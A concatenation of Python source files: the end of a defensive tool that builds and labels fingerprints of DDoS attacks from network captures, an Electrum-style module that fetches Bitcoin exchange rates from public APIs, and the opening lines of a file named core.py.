:param multi_vector_attack_flag: attack composed by multiple protocols
:return fingerprints: json file
"""
# remove target IP from dataframe since it will be anonymized
del df_attack_vector['ip_dst']
attack_vector_protocol = df_attack_vector['highest_protocol'].iloc[0]
logger.info("Processing attack_vector based on {}".format(attack_vector_protocol))
# DETECTION RATE HEURISTIC
dic_ratio_array = []
### FIRST HEURISTIC
fingerprint = single_vector_heuristic(df_attack_vector,n_type)
if (multi_vector_attack_flag):
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df_attack_vector,fingerprint)
else:
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,fingerprint)
logger.debug(dict_accuracy_ratio)
if (dict_accuracy_ratio != NONE):
logger.debug('-' * 60)
logger.info("HEURISTIC 1: matching ratio {}%".format((dict_accuracy_ratio.get("ratio"))))
logger.debug("First heuristic matching ratio = {}".format(dict_accuracy_ratio.get("ratio")))
logger.debug("First heuristic fingerprint = {}".format((dict_accuracy_ratio.get("fingerprint"))))
logger.debug("First fingerprint lengh = {}".format(len(dict_accuracy_ratio.get("fingerprint"))))
logger.debug('-' * 60)
dict_accuracy_ratio['size'] = len(dict_accuracy_ratio.get("fingerprint"))
dic_ratio_array.append(dict_accuracy_ratio)
else:
logger.info("HEURISTIC 1: matching ratio 0%")
### SECOND HEURISTIC
fingerprint = multifragmentation_heuristic(df_attack_vector,n_type)
if (multi_vector_attack_flag):
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df_attack_vector,fingerprint)
else:
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,fingerprint)
logger.debug(dict_accuracy_ratio)
if (dict_accuracy_ratio != NONE):
logger.debug('-' * 60)
logger.info("HEURISTIC 2: matching ratio {}%".format((dict_accuracy_ratio.get("ratio"))))
logger.debug("Second heuristic matching ratio = {}".format(dict_accuracy_ratio.get("ratio")))
logger.debug("Second heuristic fingerprint = {}".format((dict_accuracy_ratio.get("fingerprint"))))
logger.debug("Second fingerprint lengh = {}".format(len(dict_accuracy_ratio.get("fingerprint"))))
logger.debug('-' * 60)
dict_accuracy_ratio['size'] = len(dict_accuracy_ratio.get("fingerprint"))
dic_ratio_array.append(dict_accuracy_ratio)
else:
logger.info("HEURISTIC 2: matching ratio 0%")
### THIRD HEURISTIC
fingerprint = multi_attack_vector_heuristic(df_attack_vector,n_type)
if (multi_vector_attack_flag):
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df_attack_vector,fingerprint)
else:
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,fingerprint)
if (dict_accuracy_ratio != NONE):
logger.info("HEURISTIC 3: matching ratio {}%".format((dict_accuracy_ratio.get("ratio"))))
logger.debug("Third heuristic matching ratio = {}".format(dict_accuracy_ratio.get("ratio")))
logger.debug("Third heuristic fingerprint = {}".format((dict_accuracy_ratio.get("fingerprint"))))
logger.debug("Third fingerprint lengh = {}".format(len(dict_accuracy_ratio.get("fingerprint"))))
logger.debug('-' * 60)
dict_accuracy_ratio['size'] = len(dict_accuracy_ratio.get("fingerprint"))
dic_ratio_array.append(dict_accuracy_ratio)
else:
logger.info("HEURISTIC 3: matching ratio 0%")
# pick the best matching rate
df_ = pd.DataFrame(dic_ratio_array)
logger.debug("Fingerprint found")
logger.debug(df_)
data = df_.sort_values(by="size",ascending=True)
# filter fingerprint with more than 2 fields
data = data[data['size'] > 2]
data["diff"] = data.ratio.diff().fillna(0).astype(int)
# Pick the longest fingerprint (it is more specific)
# If the signature has less detection ratio (-10) get the biggest fingerprint
fingerprint = data[data['diff']>-10].sort_values(by="size",ascending=False).head(1)['fingerprint'].values[0]
# did not get bigger length fingerprint, then get the best ratio
if not fingerprint:
fingerprint = df_.sort_values(by="ratio",ascending=False).loc[0,"fingerprint"]
print (df_.sort_values(by="ratio",ascending=False).loc[0,"ratio"])
return (fingerprint)
#------------------------------------------------------------------------------
def bar(row):
"""
Plot ASCII bar
:param row: line to be printed
"""
percent = int(row['percent'])
bar_chunks, remainder = divmod(int(percent * 8 / increment), 8)
count = str(row['counts'])
label = row['index']
percent = str(percent)
bar = '█' * bar_chunks
if remainder > 0:
bar += chr(ord('█') + (8 - remainder))
# If the bar is empty, add a left one-eighth block
bar = bar or '▏'
print ("{} | {} - {}% {}".format( label.rjust(longest_label_length), count.rjust(longest_count_length),percent.rjust(3), bar ))
return ()
#------------------------------------------------------------------------------
def add_label(fingerprints,df):
"""
Add labels to fingerprint generated
"""
# UDP Service Mapping
udp_service = {
25: 'SMTP',
123: 'NTP',
1121: 'Memcached',
1194: 'OpenVPN',
1434: 'SQL server',
1718: 'H323',
1900: 'SSDP',
3074: 'Game Server',
3283: 'Apple Remote Desktop',
3702: 'WSD - Web Services Discovery',
5683: 'CoAP',
20800: 'Game Server',
27015: 'Game Server',
30718: 'IoT Lantronix',
33848: 'Jenkins Server',
37810: 'DVR DHCPDiscover',
47808: 'BACnet',
}
generic_amplification_ports = [53, 389, 123, 161, 672]
label = []
for fingerprint in fingerprints:
if (len(fingerprints)>1):
label.append("MULTI_VECTOR_ATTACK")
else:
label.append("SINGLE_VECTOR_ATTACK")
# add protocol name to label list
if 'highest_protocol' in fingerprint:
label.append(", ".join(fingerprint['highest_protocol']))
if 'dns_qry_name' in fingerprint:
label.append("DNS_QUERY")
if 'udp_length' in fingerprint:
# Based on FBI Flash Report MU-000132-DD
df_length = (df.groupby(['srcport'])['udp_length'].max()).reset_index()
if (len(df_length.udp_length>468)):
label.append("UDP_SUSPECT_LENGTH")
for port in udp_service:
if ("srcport" in fingerprint):
if (fingerprint['srcport'] == [port]):
label.append("AMPLIFICATION")
label.append("RDDoS")
label.append(udp_service[port])
# Frag attack
if 'fragmentation' in fingerprint:
value = fingerprint.get('fragmentation')[0]
if (value==True):
label.append("FRAGMENTATION")
# Generic amplification attack
if ("srcport" in fingerprint):
if (len(fingerprint['srcport']) > 1):
label.append("MULTIPROTOCOL")
for port in generic_amplification_ports:
if (port in list(fingerprint['srcport'])):
label.append("AMPLIFICATION")
continue
return (list(set(label)))
#------------------------------------------------------------------------------
def logo():
print ('''
_____ _____ _____ _____ ____
| __ \| __ \ / ____| __ \| _ \
| | | | | | | ___| (___ | | | | |_) |
| | | | | | |/ _ \\ ___ \| | | | _ <
| |__| | |__| | (_) |___) | |__| | |_) |
|_____/|_____/ \___/_____/|_____/|____/
''')
#------------------------------------------------------------------------------
def import_logfile(args):
"""
Load configuration file to structured format
:param args: command line parameters
:return config: structured format
"""
if (args.config):
if os.path.isfile(args.config) and os.access(args.config, os.R_OK):
msg = "Using configuration file [{}]".format(args.config)
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
logger.debug("Configuration found: {}".format(args.config))
config = configparser.ConfigParser()
config.read(args.config)
return (config)
else:
print ("Configuration file provided [{}] not found ".format(args.config))
return None
#------------------------------------------------------------------------------
def prepare_fingerprint_upload(df_fingerprint,df,fingerprints,n_type,labels,fingerprint_dir):
"""
Add addicional fields and stats to the generated fingerprint
:param df_fingerprint: dataframe filtered based on matched fingerprint
:param df: datafram itself
:param fingerprint: json file
:param n_type: network file type (flows,pcap)
:return json file
"""
fingerprint_combined = {}
fingerprint_array = []
# add one_line_fingerprint (summary) to each attack_vector fingerprint
for attack_vector in fingerprints:
attack_vector_anon = copy.deepcopy(attack_vector)
attack_vector_anon.update({"src_ips": "omitted"})
del attack_vector_anon['attack_vector_key']
one_line_fingerprint = str(attack_vector_anon).translate(str.maketrans("", "", "[]"))
attack_vector.update({"one_line_fingerprint": one_line_fingerprint })
fingerprint_array.append(attack_vector)
# fingerprints
fingerprint_combined.update({"attack_vector": fingerprint_array})
# timestamp fields
initial_timestamp = df_fingerprint['frame_time_epoch'].min()
initial_timestamp = datetime.utcfromtimestamp(initial_timestamp).strftime('%Y-%m-%d %H:%M:%S')
fingerprint_combined.update( {"start_time": initial_timestamp} )
duration_sec = df_fingerprint['frame_time_epoch'].max() - df_fingerprint['frame_time_epoch'].min()
duration_sec = '{:.2}'.format(duration_sec)
fingerprint_combined.update( {"duration_sec": float(duration_sec)} )
fingerprint_combined.update( {"total_dst_ports": len(df_fingerprint['dstport'].unique().tolist())} )
if (n_type == FLOW_TYPE):
# FIXME - should consider the sample rate
fingerprint_combined.update( {"avg_bps": int(df_fingerprint.in_packets.mean())})
fingerprint_combined.update( {"total_packets": int(df_fingerprint.in_packets.sum())})
else:
duration_sec = float(duration_sec)
fingerprint_combined.update( {"avg_bps": int(df_fingerprint.frame_len.sum()/duration_sec) })
fingerprint_combined.update( {"total_packets": len(df_fingerprint)} )
# keys used on the repository
sha256 = hashlib.sha256(str(fingerprint).encode()).hexdigest()
fingerprint_combined.update( {"ddos_attack_key": sha256} )
fingerprint_combined.update( {"key": sha256[:15]} )
fingerprint_combined.update( {"total_ips": len(df_fingerprint['ip_src'].unique().tolist()) })
if (n_type == 0):
n_type = "FLOW"
else:
n_type = "PCAP"
fingerprint_combined.update( {"file_type": n_type})
fingerprint_combined.update( {"tags": labels})
# save fingerprint to local file in order to enable the upload via POST
if not os.path.exists(fingerprint_dir):
os.makedirs(fingerprint_dir)
json_file = "{}/{}.json".format(fingerprint_dir,sha256[:32])
try:
with open(json_file, 'w') as f_fingerprint:
json.dump(fingerprint_combined, f_fingerprint)
files = {
"json": open(json_file, "rb"),
# ignoring pcap file upload for now
"pcap": open(json_file, "rb"),
}
except:
logger.info("Could not save fingerprint {}".format(json_file))
return (fingerprint_combined,json_file)
#------------------------------------------------------------------------------
def print_fingerprint(fingerprint):
"""
Print a summarized version of the fingerprint generated using
the highlight module.
"""
# anon src_ips
attack_vectors_array = fingerprint["attack_vector"]
anon_attack_vector = []
for vector in attack_vectors_array:
vector.update({"src_ips": "ommited"})
anon_attack_vector.append(vector)
fingerprint["attack_vector"] = anon_attack_vector
fingerprint.update({"tags": labels})
json_str = json.dumps(fingerprint, indent=4, sort_keys=True)
msg = "Generated fingerprint"
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
print(highlight(json_str, JsonLexer(), TerminalFormatter()))
#------------------------------------------------------------------------------
def evaluate_fingerprint_ratio(df,fingerprints,fragmentation_attack_flag):
"""
Get the fingerprint and get matching ratio using the input file
param: df input file
param: fragmentation_attack_flag fragmentation flag (network
layer) used to cluster data without layer 7 info.
"""
if (len(fingerprints)==0):
print ("Could not find a fingerprint for this network file :(" )
sys.exit()
if (len(fingerprints)==1):
# only one fingerprint was found
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,fingerprints[0])
if fragmentation_attack_flag:
logger.debug("multivector attack with fragmentation - one fingerprint")
logger.debug("1 fingerprint found, but it was expected more than 1, since it is a fragmentation attack")
# add fragmentation dataframe because a fragmentation attack was detected
df_frag = df[df['highest_protocol'].str.contains('IPv[46]')]
# add fragmentation IPs to the evaluatioa dataframe
df_all = pd.concat([df_frag,df_fingerprint])
return (df_all)
# No fragmentation
else:
logger.debug("multivector attack with NO fragmentation - one fingerprint")
return (df_fingerprint)
# more than 1 fingerprint was found
else:
# more than 1 fingerprint and they are related to fragmentation attack
df_attack_vector_combined = pd.DataFrame()
# get dataframe per fingerprint and combine it
for attack_vector_fingerprint in fingerprints:
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,attack_vector_fingerprint)
df_attack_vector_combined = pd.concat([df_attack_vector_combined,df_fingerprint])
# add fragmentation dataframe to the filtered one
if fragmentation_attack_flag:
logger.debug("multivector attack with fragmentation - 1+ fingerprints")
df_frag = df[df['highest_protocol'].str.contains('IPv[46]')]
df_attack_vector_combined = pd.concat([df_frag,df_attack_vector_combined])
# more than 1 fingerprint and they are NOT related to fragmentation attack
else:
logger.debug("multivector attack with NO fragmentation - 1+ fingerprints")
return (df_attack_vector_combined)
###############################################################################
### Main Process
if __name__ == '__main__':
logo()
signal.signal(signal.SIGINT, signal_handler)
parser = parser_add_arguments()
args = parser.parse_args()
logger = logger(args)
config = import_logfile(args)
if (args.version):
print ("version: {}".format(version))
sys.exit(0)
if (args.status):
check_repository(config)
df = pd.DataFrame()
for filename in args.filename:
if (not filename):
parser.print_help()
sys.exit(IOError("\nInput file not provided. Use '-f' for that."))
if (not os.path.exists(filename)):
logger.error(IOError("File " + filename + " is not readble"))
sys.exit(IOError("File " + filename + " is not readble"))
# load network file
n_type,df_ = load_file(args,filename)
df = pd.concat([df_, df],sort=False)
if not isinstance(df, pd.DataFrame):
logger.error("could not convert input file <{}>".format(args.filename))
sys.exit(1)
# checking if the provided file could be converted to dataframe
if (len(df)<2):
logger.error("could not read data from file <{}>".format(args.filename))
sys.exit(1)
##
## DETECT TARGET
##
# usually is only one target, but on anycast/load balanced may have more
(target_ip_list,df) = infer_target_ip(df,n_type)
try:
target_ip = target_ip_list[0]
except:
print ("Target IP could not be infered.")
sys.exit(0)
# build filter for victim IP
msg = "Processing target IP address: {}".format(target_ip)
df_target = df[df['ip_dst'] == target_ip]
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
logger.debug(msg)
##
## IDENTIFY ATTACK VECTORS (PROTOCOL)
##
(lst_attack_protocols, fragmentation_attack_flag) = infer_protocol_attack(df_target,n_type)
multi_vector_attack_flag = False
# more than one protocol as outliers
if (len(lst_attack_protocols)>1):
multi_vector_attack_flag = True
logger.info("Multi-vector attack based on: {} : fragmentation [{}]".format(lst_attack_protocols,fragmentation_attack_flag))
else:
logger.info("Single attack based on: {} : fragmentation [{}]".format(lst_attack_protocols,fragmentation_attack_flag))
##
## IDENTIFY FINGERPRINTS
##
fingerprints = []
# fingerprint per attack vector
for protocol in lst_attack_protocols:
# filter database based on protocol and target
df_attack_vector = df[(df['ip_dst'] == target_ip) & (df['highest_protocol'] == protocol)]
fingerprint = build_attack_fingerprint(df,df_attack_vector,n_type,multi_vector_attack_flag)
# get src_ips per attack vector
src_ips = []
src_ips.append(fingerprint)
df_src_ips = evaluate_fingerprint_ratio(df,src_ips,fragmentation_attack_flag)
fingerprint.update( {"src_ips": df_src_ips['ip_src'].unique().tolist()})
# generate key for this attack vector
sha256 = hashlib.sha256(str(fingerprint).encode()).hexdigest()
fingerprint.update( {"attack_vector_key": sha256} )
fingerprints.append(fingerprint)
##
## FINGERPRINT EVALUATION
##
df_filtered = evaluate_fingerprint_ratio(df,fingerprints,fragmentation_attack_flag)
# infer tags based on the generated fingerprint
labels = add_label(fingerprints,df_filtered)
# add extra fields/stats and save file locally
(enriched_fingerprint,json_file) = prepare_fingerprint_upload(df_filtered,df,fingerprints,n_type,labels,args.fingerprint_dir)
# show summarized fingerprint
print_fingerprint(enriched_fingerprint)
# print matching ratio
if (args.summary): evaluate_fingerprint(df,df_filtered,enriched_fingerprint)
# generate graphic file (dot)
if (args.graph): generate_dot_file(df_fingerprint, df)
print ("Fingerprint saved on {}".format(json_file))
if (args.upload):
(user,passw,host) = get_repository(args,config)
# upload to the repository
ret = upload(enriched_fingerprint, json_file, user, passw, host, enriched_fingerprint.get("key"))
sys.exit(0)
#EOF
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'}, timeout=10)
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = os.path.join(cache_dir, self.name() + '_'+ ccy)
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r', encoding='utf-8') as f:
h = json.loads(f.read())
h['timestamp'] = timestamp
except:
h = None
else:
h = None
if h:
self.history[ccy] = h
self.on_history()
return h
def get_historical_rates_safe(self, ccy, cache_dir):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
except BaseException as e:
self.print_error("failed fx history:", e)
return
filename = os.path.join(cache_dir, self.name() + '_' + ccy)
with open(filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(h))
h['timestamp'] = time.time()
self.history[ccy] = h
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
if ccy not in self.history_ccys():
return
h = self.history.get(ccy)
if h is None:
h = self.read_historical_rates(ccy, cache_dir)
if h is None or h['timestamp'] < time.time() - 24*3600:
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
t.setDaemon(True)
t.start()
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'), 'NaN')
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("BTC", ""), Decimal(json[r]['last']))
for r in json if r != 'timestamp'])
def history_ccys(self):
return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
'ZAR']
def request_history(self, ccy):
history = self.get_csv('apiv2.bitcoinaverage.com',
"/indices/global/history/BTC%s?period=alltime&format=csv" % ccy)
return dict([(h['DateTime'][:10], h['Average'])
for h in history])
class Bitcointoyou(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitcointoyou.com', "/API/ticker.aspx")
return {'BRL': Decimal(json['ticker']['last'])}
def history_ccys(self):
return ['BRL']
class BitcoinVenezuela(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitcoinvenezuela.com', '/')
rates = [(r, json['BTC'][r]) for r in json['BTC']
if json['BTC'][r] is not None] # Giving NULL for LTC
return dict(rates)
def history_ccys(self):
return ['ARS', 'EUR', 'USD', 'VEF']
def request_history(self, ccy):
return self.get_json('api.bitcoinvenezuela.com',
"/historical/index.php?coin=BTC")[ccy +'_BTC']
class Bitbank(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('public.bitbank.cc', '/btc_jpy/ticker')
return {'JPY': Decimal(json['data']['last'])}
class BitFlyer(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitflyer.jp', '/api/echo/price')
return {'JPY': Decimal(json['mid'])}
class Bitmarket(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitmarket.pl', '/json/BTCPLN/ticker.json')
return {'PLN': Decimal(json['last'])}
class BitPay(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitpay.com', '/api/rates')
return dict([(r['code'], Decimal(r['rate'])) for r in json])
class Bitso(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitso.com', '/v2/ticker')
return {'MXN': Decimal(json['last'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitstamp.net', '/api/ticker/')
return {'USD': Decimal(json['last'])}
class Bitvalor(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['total']['last'])}
class BlockchainInfo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('blockchain.info', '/ticker')
return dict([(r, Decimal(json[r]['15m'])) for r in json])
class BTCChina(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('data.btcchina.com', '/data/ticker')
return {'CNY': Decimal(json['ticker']['last'])}
class BTCParalelo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('btcparalelo.com', '/api/price')
return {'VEF': Decimal(json['price'])}
class Coinbase(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('coinbase.com',
'/api/v1/currencies/exchange_rates')
return dict([(r[7:].upper(), Decimal(json[r]))
for r in json if r.startswith('btc_to_')])
class CoinDesk(ExchangeBase):
def get_currencies(self):
dicts = self.get_json('api.coindesk.com',
'/v1/bpi/supported-currencies.json')
return [d['currency'] for d in dicts]
def get_rates(self, ccy):
json = self.get_json('api.coindesk.com',
'/v1/bpi/currentprice/%s.json' % ccy)
result = {ccy: Decimal(json['bpi'][ccy]['rate_float'])}
return result
def history_starts(self):
return { 'USD': '2012-11-30', 'EUR': '2013-09-01' }
def history_ccys(self):
return self.history_starts().keys()
def request_history(self, ccy):
start = self.history_starts()[ccy]
end = datetime.today().strftime('%Y-%m-%d')
# Note ?currency and ?index don't work as documented. Sigh.
query = ('/v1/bpi/historical/close.json?start=%s&end=%s'
% (start, end))
json = self.get_json('api.coindesk.com', query)
return json['bpi']
class Coinsecure(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinsecure.in', '/v0/noauth/newticker')
return {'INR': Decimal(json['lastprice'] / 100.0 )}
class Foxbit(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['FOX']['last'])}
class itBit(ExchangeBase):
def get_rates(self, ccy):
ccys = ['USD', 'EUR', 'SGD']
json = self.get_json('api.itbit.com', '/v1/markets/XBT%s/ticker' % ccy)
result = dict.fromkeys(ccys)
if ccy in ccys:
result[ccy] = Decimal(json['lastPrice'])
return result
class Kraken(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD', 'CAD', 'GBP', 'JPY']
pairs = ['XBT%s' % c for c in ccys]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
return dict((k[-3:], Decimal(float(v['c'][0])))
for k, v in json['result'].items())
class LocalBitcoins(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('localbitcoins.com',
'/bitcoinaverage/ticker-all-currencies/')
return dict([(r, Decimal(json[r]['rates']['last'])) for r in json])
class MercadoBitcoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['MBT']['last'])}
class NegocieCoins(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['NEG']['last'])}
def history_ccys(self):
return ['BRL']
class Unocoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.unocoin.com', 'trade?buy')
return {'INR': Decimal(json)}
class WEX(ExchangeBase):
def get_rates(self, ccy):
json_eur = self.get_json('wex.nz', '/api/3/ticker/btc_eur')
json_rub = self.get_json('wex.nz', '/api/3/ticker/btc_rur')
json_usd = self.get_json('wex.nz', '/api/3/ticker/btc_usd')
return {'EUR': Decimal(json_eur['btc_eur']['last']),
'RUB': Decimal(json_rub['btc_rur']['last']),
'USD': Decimal(json_usd['btc_usd']['last'])}
class Winkdex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('winkdex.com', '/api/v0/price')
return {'USD': Decimal(json['price'] / 100.0)}
def history_ccys(self):
return ['USD']
def request_history(self, ccy):
json = self.get_json('winkdex.com',
"/api/v0/series?start_time=1342915200")
history = json['series'][0]['results']
return dict([(h['timestamp'][:10], h['price'] / 100.0)
for h in history])
class Zaif(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.zaif.jp', '/api/1/last_price/btc_jpy')
return {'JPY': Decimal(json['last_price'])}
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r', encoding='utf-8') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print(name, "ok")
except:
print(name, "error")
continue
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
if not os.path.exists(self.cache_dir):
os.mkdir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_history_capital_gains_config(self):
return bool(self.config.get('history_rates_capital_gains', False))
def set_history_capital_gains_config(self, b):
self.config.set_key('history_rates_capital_gains', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'BitcoinAverage')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, BitcoinAverage)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
self.exchange.read_historical_rates(self.ccy, self.cache_dir)
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate is None:
return Decimal('NaN')
return Decimal(rate)
def format_amount(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s" % self.value_str(btc_balance, rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate.is_nan() else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def fiat_value(self, satoshis, rate):
return Decimal('NaN') if satoshis is None else Decimal(satoshis) / COIN * Decimal(rate)
def value_str(self, satoshis, rate):
return self.format_fiat(self.fiat_value(satoshis, rate))
def format_fiat(self, value):
if value.is_nan():
return _("No data")
return "%s" % (self.ccy_amount_str(value, True))
def history_rate(self, d_t):
if d_t is None:
return Decimal('NaN')
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate == 'NaN' and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy, 'NaN')
self.history_used_spot = True
return Decimal(rate)
def historical_value_str(self, satoshis, d_t):
return self.format_fiat(self.historical_value(satoshis, d_t))
def historical_value(self, satoshis, d_t):
return self.fiat_value(satoshis, self.history_rate(d_t))
def timestamp_rate(self, timestamp):
from electrum.util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
core.py
|
#!/usr/bin/env python
import requests, threading, time, json, sys, socket, random
from queue import Queue
class AsyncRequest(object):
